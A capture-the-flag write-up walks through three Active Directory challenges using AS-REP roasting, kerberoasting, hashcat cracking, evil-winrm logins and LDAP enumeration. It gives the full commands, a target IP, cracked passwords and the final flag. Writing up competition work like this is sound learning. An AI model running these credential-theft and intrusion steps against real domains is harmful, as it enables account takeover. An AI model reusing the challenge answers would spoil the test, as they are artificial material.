3.7 KiB
Blemflarck
This challenge is related to Active Directory in which we are given these files, admins.txt , hosts and nmap.txt
admins.txt contains a list of usernames
nmap.txt contains result of nmap of the domain controller
and hosts contains the IP and domain name of the target
Now to start solving this, we have a list of usernames of the domain, need to verfiy which users are valid on the domain for that we can use kerbrute
We can try performing AS-REP roasting using `GetNPUsers` from `impacket` in which the user `shreya` doesn't have pre-authentication set so without providing a valid password for the user we can request for his TGT
GetNPUsers.py vindicators.space/ -usersfile ./admins.txt -request
To crack this we can use hashcat with mode `18200
hashcat -a 0 -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt --force
This will crack the hash with password $anturce77RioGr@ndePR
Now having the credentials we can login through WinRM which is running on port 5985 using `evil-winrm`
evil-winrm -i 34.218.188.252 -u 'shreya' -p ''
After logging in we can get the flag for this challenge
PhoenixPerson
This challenge is continuation from the first one, we have a valid set of credential, we can try using kerberoasting, if there's a SPN tied to an account we can request for TGS and later crack it
GetUserSPNs.py vindicators.space/shreya -request
Runing hashcat to crack this hash
Now logging with mirage user
evil-winrm -i 34.218.188.252 -u 'mirage' -p '!@#New_Life87!@#'
DAB-389 b
This challenge is the last part of AD category where we need to find the third flag through the user mirage
From the description the number 389 is referrenced as LDAP which is the port number for that service, we need to enumerate LDAP, there's a tool called ldapdomaindump
ldapdomaindump -u 'mirage' -p '!@#New_Life87!@#' ldap://34.218.188.252
This will generate some html files for users, groups and computers in the domain, going through the `domain_users.html` file we'll get the first part of the flag
The second part will be found from domain_computers.html
And the third one from domain_groups.html
We can get the flag through grep as well by using regular expression
Which makes the final flag
flag{3fe05494a09ac38bb5199698b475c48c_LD4P_3num3r4t10n_FTW_:)}
There were good challenges and a lot of categories including web3, cloud and source code review which I haven't done before, due to me doing "real world assesments" I wasn't able to touch the rest of the challenges
